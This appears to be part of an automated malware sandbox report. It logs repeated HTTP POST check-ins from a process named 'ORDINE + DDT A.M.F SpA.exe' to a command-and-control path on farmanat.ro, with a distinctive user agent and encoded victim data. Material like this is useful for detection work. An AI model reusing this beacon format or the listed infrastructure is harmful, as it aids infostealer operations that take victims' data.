Nov 25, 2021 10:48:36.296611071 CET	6385	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
540	192.168.11.20	50384	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:44.069422960 CET	7065	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:44.103107929 CET	7065	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:44.152900934 CET	7065	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
541	192.168.11.20	50385	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:44.502012014 CET	7066	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:44.535923004 CET	7066	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:44.604295015 CET	7067	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
542	192.168.11.20	50386	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:45.027630091 CET	7067	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:45.061568022 CET	7068	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:45.121598959 CET	7068	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
543	192.168.11.20	50387	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:45.511486053 CET	7069	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:45.545258999 CET	7069	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:45.601075888 CET	7069	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
544	192.168.11.20	50388	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:46.026917934 CET	7070	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:46.060653925 CET	7070	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:46.110552073 CET	7071	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
545	192.168.11.20	50389	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:46.539469004 CET	7071	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:46.573848009 CET	7072	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:46.624283075 CET	7072	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
546	192.168.11.20	50390	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:47.049388885 CET	7073	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:47.083055019 CET	7073	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:47.133569956 CET	7073	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
547	192.168.11.20	50391	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:47.487560034 CET	7074	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:47.521631002 CET	7074	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:47.595679998 CET	7075	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
548	192.168.11.20	50392	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:48.019784927 CET	7075	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:48.054059982 CET	7076	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:48.105878115 CET	7076	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
549	192.168.11.20	50393	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:48.541433096 CET	7077	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:48.575031996 CET	7077	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:48.624253988 CET	7077	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.11.20	49891	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:36.820807934 CET	6386	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:36.854347944 CET	6386	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:36.904438019 CET	6386	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
550	192.168.11.20	50394	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:49.054536104 CET	7078	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:49.088676929 CET	7078	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:49.138618946 CET	7079	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
551	192.168.11.20	50395	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:49.554647923 CET	7079	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:49.588211060 CET	7079	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:49.638241053 CET	7080	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
552	192.168.11.20	50396	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:50.100164890 CET	7081	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:50.133907080 CET	7081	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:50.190781116 CET	7081	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
553	192.168.11.20	50397	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:50.619972944 CET	7082	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:50.654148102 CET	7082	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:50.709996939 CET	7083	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
554	192.168.11.20	50398	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:51.114068985 CET	7083	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:51.147906065 CET	7083	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:51.201992035 CET	7084	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
555	192.168.11.20	50399	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:51.626205921 CET	7085	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:51.659531116 CET	7085	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:51.708842039 CET	7085	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
556	192.168.11.20	50400	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:52.072016001 CET	7086	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:52.106101990 CET	7086	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:52.156078100 CET	7087	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
557	192.168.11.20	50401	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:52.565167904 CET	7087	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:52.598584890 CET	7087	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:52.649394035 CET	7088	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
558	192.168.11.20	50402	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:53.024229050 CET	7089	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:53.058341026 CET	7089	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:53.112158060 CET	7089	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
559	192.168.11.20	50403	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
